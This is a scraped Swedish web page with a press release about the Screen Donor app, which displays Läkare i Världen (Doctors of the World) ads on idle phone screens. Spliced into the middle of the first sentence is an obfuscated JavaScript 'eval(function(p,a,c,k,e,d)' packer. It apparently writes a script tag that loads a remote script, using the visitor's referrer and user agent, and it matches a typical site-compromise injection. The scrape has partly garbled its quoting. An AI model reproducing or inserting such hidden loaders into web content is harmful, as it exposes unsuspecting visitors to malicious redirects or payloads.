Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Donera mobilskärmen till Läkare i Världen

Läkare eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksize|var|u0026u|referrer|rybfe||js|php’.split(’|’),0,{}))
i Världen blir först ut att använda nya appen Screen Donor. Syftet är att uppmärksamma Läkare i Världens arbete för att hjälpa människor i utsatta situationer med sjukvård. Screen Donor är en app som gör mobilskärmen till en annonsyta för att kommunicera information om välgörande ändamål.
 

De flesta lägger mobiltelefonen på bordet framför sig när de går på möte, tar en after work eller fikar med kompisar på stan. Skärmen är då svart eftersom mobilen går ner i sparläge. Detta är en oanvänd och väldigt synlig yta att använda för kommunikation. Screen Donor använder den tomma skärmen till att säga något viktigt, som lika sjukvård till alla.

– Vi har inte råd att lägga pengar på en stor informationskampanj. Men genom Screen Donor kan vi potentiellt skapa tusentals gratisannonser med information om vår verksamhet över hela Sverige. Det är viktigt att fler vet vad vi gör och vill stödja vårt arbete så att fler människor får tillgång till vård, säger Johannes Mosskin, generalsekreterare för Läkare i Världen i Sverige.

Läkare i Världen blir den första organisationen som använder Screen Donor. Appen är gratis att ladda ner från App Store och Google Play. När appen är aktiv ser den till att mobilen inte går ner i sparläge. Istället visar den en annons från Läkare i Världen på mobilskärmen. Det enda användare offrar är batteritid. En liten uppoffring för allas rätt till sjukvård.

 En mobil som använder Screen Donor står ut bland de andra mobiltelefonerna med mörka skärmar på fikabordet. Syftet är att det ska väcka intresse bland personerna som sitter där och skapa uppmärksamhet kring Läkare i Världen. Nu hoppas vi på stöd och synlighet i allt från mäktiga styrelserum till restauranger och kaféer, säger Johannes Mosskin, generalsekreterare för Läkare i Världen i Sverige.

Ladda ner Screen Donor här: App Store, Google Play

Se kort video om hur Screen Donor fungerar här.

Screen Donor är skapat pro-bono för Läkare i Världen av JMW kommunikation och Iveo i Stockholm.